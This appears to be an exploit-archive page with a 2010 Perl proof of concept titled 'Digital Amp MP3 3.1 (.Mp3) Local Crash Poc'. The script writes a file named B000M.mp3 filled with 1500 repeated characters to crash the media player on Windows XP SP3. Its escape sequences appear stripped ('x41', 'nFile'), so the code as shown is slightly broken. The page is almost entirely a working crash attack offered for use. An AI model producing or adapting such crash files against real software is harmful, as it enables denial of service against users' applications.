[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Digital Amp MP3 3.1 (.Mp3) Local Crash Poc
# Published : 2010-02-02
# Author : SkuLL-HackeR
# Previous Title : Opera 10.10 Remote Code Execution DoS Exploit
# Next Title : Xerox Workcenter 4150 Remote Buffer Overflow
#!/usr/bin/perl
# H0m3 : S3curity-art.com
# M4!l: Wizard-skh@hotmail.com
# T3st3d on: Windows XP SP3
print "Tic-Tac";
my $boom="x41" x 1500;
my $filename = "B000M.mp3";
open (FILE,">$filename");
print FILE "$boom";
print "nFile successfully created!n";